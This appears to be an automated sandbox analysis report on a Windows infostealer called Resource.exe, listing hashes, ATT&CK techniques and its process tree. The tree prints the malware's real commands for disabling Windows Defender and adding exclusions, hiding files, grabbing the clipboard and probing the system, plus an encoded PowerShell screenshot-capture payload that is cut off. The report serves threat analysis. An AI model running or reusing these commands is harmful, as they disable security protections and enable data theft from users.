f0488dfe3993217dd94896bf13bbd780201a7f5b41461e5a1baf5827f3226392

Analysis

max time kernel
146s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-01-2025 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Resource.exe
Size

7.4MB
MD5

cd56d1639c638ef44a1cbcf6756ef2ba
SHA1

784970f33b026fe770d8c0f8938d17b26c428327
SHA256

79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
SHA512

c00a3be6d4cbc672b4fe3b4afb5072832a870c99d795656380e23d33e9b7b45f2d0851ba86e1d35fe502af2d001cf13e13ff6d431349dc166cfbdcc54bb19b39
SSDEEP

196608:qw0cDemLjv+bhqNVoBKUh8mz4Iv9Pmu1D7wJo:SieaL+9qz8/b4IsuRmo

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2408	powershell.exe
4432	powershell.exe
2184	powershell.exe
3404	powershell.exe
2452	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Resource.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2384	cmd.exe
1460	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2384	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe
3788	Resource.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4840	tasklist.exe
5044	tasklist.exe
3592	tasklist.exe
2104	tasklist.exe
2812	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3956	cmd.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aadd-21.dat	upx
behavioral1/memory/3788-25-0x00007FFF1D7A0000-0x00007FFF1DD89000-memory.dmp	upx
behavioral1/files/0x001900000002aac9-27.dat	upx
behavioral1/memory/3788-29-0x00007FFF21D00000-0x00007FFF21D23000-memory.dmp	upx
behavioral1/files/0x001900000002aadb-30.dat	upx
behavioral1/files/0x001900000002aad5-48.dat	upx
behavioral1/files/0x001900000002aad2-47.dat	upx
behavioral1/files/0x001900000002aad1-46.dat	upx
behavioral1/files/0x001c00000002aad0-45.dat	upx
behavioral1/files/0x001900000002aacf-44.dat	upx
behavioral1/files/0x001900000002aacc-43.dat	upx
behavioral1/files/0x001900000002aacb-42.dat	upx
behavioral1/files/0x001900000002aac8-41.dat	upx
behavioral1/files/0x004600000002aae4-40.dat	upx
behavioral1/files/0x001900000002aae3-39.dat	upx
behavioral1/files/0x001c00000002aae2-38.dat	upx
behavioral1/files/0x001c00000002aadc-35.dat	upx
behavioral1/files/0x001900000002aad8-34.dat	upx
behavioral1/memory/3788-32-0x00007FFF275A0000-0x00007FFF275AF000-memory.dmp	upx
behavioral1/memory/3788-54-0x00007FFF217D0000-0x00007FFF217FD000-memory.dmp	upx
behavioral1/memory/3788-56-0x00007FFF232E0000-0x00007FFF232F9000-memory.dmp	upx
behavioral1/memory/3788-58-0x00007FFF217A0000-0x00007FFF217C3000-memory.dmp	upx
behavioral1/memory/3788-60-0x00007FFF1DEB0000-0x00007FFF1E027000-memory.dmp	upx
behavioral1/memory/3788-62-0x00007FFF230A0000-0x00007FFF230B9000-memory.dmp	upx
behavioral1/memory/3788-66-0x00007FFF21760000-0x00007FFF21793000-memory.dmp	upx
behavioral1/memory/3788-64-0x00007FFF27590000-0x00007FFF2759D000-memory.dmp	upx
behavioral1/memory/3788-71-0x00007FFF1D6D0000-0x00007FFF1D79D000-memory.dmp	upx
behavioral1/memory/3788-74-0x00007FFF21D00000-0x00007FFF21D23000-memory.dmp	upx
behavioral1/memory/3788-73-0x00007FFF18C50000-0x00007FFF19172000-memory.dmp	upx
behavioral1/memory/3788-70-0x00007FFF1D7A0000-0x00007FFF1DD89000-memory.dmp	upx
behavioral1/memory/3788-76-0x00007FFF21630000-0x00007FFF21644000-memory.dmp	upx
behavioral1/memory/3788-79-0x00007FFF22000000-0x00007FFF2200D000-memory.dmp	upx
behavioral1/memory/3788-78-0x00007FFF217D0000-0x00007FFF217FD000-memory.dmp	upx
behavioral1/memory/3788-82-0x00007FFF1D5B0000-0x00007FFF1D6CC000-memory.dmp	upx
behavioral1/memory/3788-81-0x00007FFF232E0000-0x00007FFF232F9000-memory.dmp	upx
behavioral1/memory/3788-106-0x00007FFF217A0000-0x00007FFF217C3000-memory.dmp	upx
behavioral1/memory/3788-154-0x00007FFF1DEB0000-0x00007FFF1E027000-memory.dmp	upx
behavioral1/memory/3788-211-0x00007FFF230A0000-0x00007FFF230B9000-memory.dmp	upx
behavioral1/memory/3788-261-0x00007FFF21760000-0x00007FFF21793000-memory.dmp	upx
behavioral1/memory/3788-276-0x00007FFF1D6D0000-0x00007FFF1D79D000-memory.dmp	upx
behavioral1/memory/3788-279-0x00007FFF18C50000-0x00007FFF19172000-memory.dmp	upx
behavioral1/memory/3788-290-0x00007FFF21D00000-0x00007FFF21D23000-memory.dmp	upx
behavioral1/memory/3788-289-0x00007FFF1D7A0000-0x00007FFF1DD89000-memory.dmp	upx
behavioral1/memory/3788-304-0x00007FFF21630000-0x00007FFF21644000-memory.dmp	upx
behavioral1/memory/3788-303-0x00007FFF1D5B0000-0x00007FFF1D6CC000-memory.dmp	upx
behavioral1/memory/3788-295-0x00007FFF1DEB0000-0x00007FFF1E027000-memory.dmp	upx
behavioral1/memory/3788-314-0x00007FFF1D7A0000-0x00007FFF1DD89000-memory.dmp	upx
behavioral1/memory/3788-343-0x00007FFF1D5B0000-0x00007FFF1D6CC000-memory.dmp	upx
behavioral1/memory/3788-345-0x00007FFF1D6D0000-0x00007FFF1D79D000-memory.dmp	upx
behavioral1/memory/3788-344-0x00007FFF18C50000-0x00007FFF19172000-memory.dmp	upx
behavioral1/memory/3788-342-0x00007FFF22000000-0x00007FFF2200D000-memory.dmp	upx
behavioral1/memory/3788-341-0x00007FFF21630000-0x00007FFF21644000-memory.dmp	upx
behavioral1/memory/3788-338-0x00007FFF21760000-0x00007FFF21793000-memory.dmp	upx
behavioral1/memory/3788-337-0x00007FFF27590000-0x00007FFF2759D000-memory.dmp	upx
behavioral1/memory/3788-336-0x00007FFF230A0000-0x00007FFF230B9000-memory.dmp	upx
behavioral1/memory/3788-335-0x00007FFF1DEB0000-0x00007FFF1E027000-memory.dmp	upx
behavioral1/memory/3788-334-0x00007FFF217A0000-0x00007FFF217C3000-memory.dmp	upx
behavioral1/memory/3788-333-0x00007FFF232E0000-0x00007FFF232F9000-memory.dmp	upx
behavioral1/memory/3788-332-0x00007FFF217D0000-0x00007FFF217FD000-memory.dmp	upx
behavioral1/memory/3788-331-0x00007FFF275A0000-0x00007FFF275AF000-memory.dmp	upx
behavioral1/memory/3788-330-0x00007FFF21D00000-0x00007FFF21D23000-memory.dmp	upx
behavioral1/memory/3788-329-0x00007FFF1D7A0000-0x00007FFF1DD89000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1048	PING.EXE
2932	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
472	WMIC.exe
3824	WMIC.exe
952	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4936	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1048	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2408	powershell.exe
2184	powershell.exe
2184	powershell.exe
2408	powershell.exe
4432	powershell.exe
4432	powershell.exe
1460	powershell.exe
1460	powershell.exe
4196	powershell.exe
4196	powershell.exe
1460	powershell.exe
4196	powershell.exe
3404	powershell.exe
3404	powershell.exe
2764	powershell.exe
2764	powershell.exe
2452	powershell.exe
2452	powershell.exe
4304	powershell.exe
4304	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4840	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: 36	1760	WMIC.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: 36	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	472	WMIC.exe
Token: SeSecurityPrivilege	472	WMIC.exe
Token: SeTakeOwnershipPrivilege	472	WMIC.exe
Token: SeLoadDriverPrivilege	472	WMIC.exe
Token: SeSystemProfilePrivilege	472	WMIC.exe
Token: SeSystemtimePrivilege	472	WMIC.exe
Token: SeProfSingleProcessPrivilege	472	WMIC.exe
Token: SeIncBasePriorityPrivilege	472	WMIC.exe
Token: SeCreatePagefilePrivilege	472	WMIC.exe
Token: SeBackupPrivilege	472	WMIC.exe
Token: SeRestorePrivilege	472	WMIC.exe
Token: SeShutdownPrivilege	472	WMIC.exe
Token: SeDebugPrivilege	472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	472	WMIC.exe
Token: SeRemoteShutdownPrivilege	472	WMIC.exe
Token: SeUndockPrivilege	472	WMIC.exe
Token: SeManageVolumePrivilege	472	WMIC.exe
Token: 33	472	WMIC.exe
Token: 34	472	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1132 wrote to memory of 3788	1132	Resource.exe	77
PID 1132 wrote to memory of 3788	1132	Resource.exe	77
PID 3788 wrote to memory of 2864	3788	Resource.exe	78
PID 3788 wrote to memory of 2864	3788	Resource.exe	78
PID 3788 wrote to memory of 1872	3788	Resource.exe	79
PID 3788 wrote to memory of 1872	3788	Resource.exe	79
PID 3788 wrote to memory of 4916	3788	Resource.exe	80
PID 3788 wrote to memory of 4916	3788	Resource.exe	80
PID 3788 wrote to memory of 3200	3788	Resource.exe	82
PID 3788 wrote to memory of 3200	3788	Resource.exe	82
PID 3788 wrote to memory of 4880	3788	Resource.exe	86
PID 3788 wrote to memory of 4880	3788	Resource.exe	86
PID 3200 wrote to memory of 4840	3200	cmd.exe	88
PID 3200 wrote to memory of 4840	3200	cmd.exe	88
PID 2864 wrote to memory of 2408	2864	cmd.exe	89
PID 2864 wrote to memory of 2408	2864	cmd.exe	89
PID 4916 wrote to memory of 4548	4916	cmd.exe	90
PID 4916 wrote to memory of 4548	4916	cmd.exe	90
PID 1872 wrote to memory of 2184	1872	cmd.exe	91
PID 1872 wrote to memory of 2184	1872	cmd.exe	91
PID 4880 wrote to memory of 1760	4880	cmd.exe	92
PID 4880 wrote to memory of 1760	4880	cmd.exe	92
PID 3788 wrote to memory of 2084	3788	Resource.exe	94
PID 3788 wrote to memory of 2084	3788	Resource.exe	94
PID 2084 wrote to memory of 2488	2084	cmd.exe	96
PID 2084 wrote to memory of 2488	2084	cmd.exe	96
PID 3788 wrote to memory of 1424	3788	Resource.exe	97
PID 3788 wrote to memory of 1424	3788	Resource.exe	97
PID 1424 wrote to memory of 2796	1424	cmd.exe	99
PID 1424 wrote to memory of 2796	1424	cmd.exe	99
PID 3788 wrote to memory of 3436	3788	Resource.exe	146
PID 3788 wrote to memory of 3436	3788	Resource.exe	146
PID 3436 wrote to memory of 472	3436	cmd.exe	102
PID 3436 wrote to memory of 472	3436	cmd.exe	102
PID 3788 wrote to memory of 1868	3788	Resource.exe	103
PID 3788 wrote to memory of 1868	3788	Resource.exe	103
PID 1868 wrote to memory of 3824	1868	cmd.exe	105
PID 1868 wrote to memory of 3824	1868	cmd.exe	105
PID 3788 wrote to memory of 3956	3788	Resource.exe	106
PID 3788 wrote to memory of 3956	3788	Resource.exe	106
PID 3788 wrote to memory of 5068	3788	Resource.exe	107
PID 3788 wrote to memory of 5068	3788	Resource.exe	107
PID 3956 wrote to memory of 3292	3956	cmd.exe	110
PID 3956 wrote to memory of 3292	3956	cmd.exe	110
PID 5068 wrote to memory of 4432	5068	cmd.exe	111
PID 5068 wrote to memory of 4432	5068	cmd.exe	111
PID 3788 wrote to memory of 1004	3788	Resource.exe	112
PID 3788 wrote to memory of 1004	3788	Resource.exe	112
PID 3788 wrote to memory of 1368	3788	Resource.exe	113
PID 3788 wrote to memory of 1368	3788	Resource.exe	113
PID 3788 wrote to memory of 3692	3788	Resource.exe	116
PID 3788 wrote to memory of 3692	3788	Resource.exe	116
PID 3788 wrote to memory of 2384	3788	Resource.exe	177
PID 3788 wrote to memory of 2384	3788	Resource.exe	177
PID 3788 wrote to memory of 564	3788	Resource.exe	120
PID 3788 wrote to memory of 564	3788	Resource.exe	120
PID 1368 wrote to memory of 5044	1368	cmd.exe	121
PID 1368 wrote to memory of 5044	1368	cmd.exe	121
PID 3788 wrote to memory of 2960	3788	Resource.exe	122
PID 3788 wrote to memory of 2960	3788	Resource.exe	122
PID 1004 wrote to memory of 3592	1004	cmd.exe	123
PID 1004 wrote to memory of 3592	1004	cmd.exe	123
PID 3788 wrote to memory of 3544	3788	Resource.exe	125
PID 3788 wrote to memory of 3544	3788	Resource.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3216	attrib.exe
4344	attrib.exe
3292	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Resource.exe
"C:\Users\Admin\AppData\Local\Temp\Resource.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Users\Admin\AppData\Local\Temp\Resource.exe
  "C:\Users\Admin\AppData\Local\Temp\Resource.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
      4⤵
      PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1424
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe"
      4⤵
      Views/modifies file attributes
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3692
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:564
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3544
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1060
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAI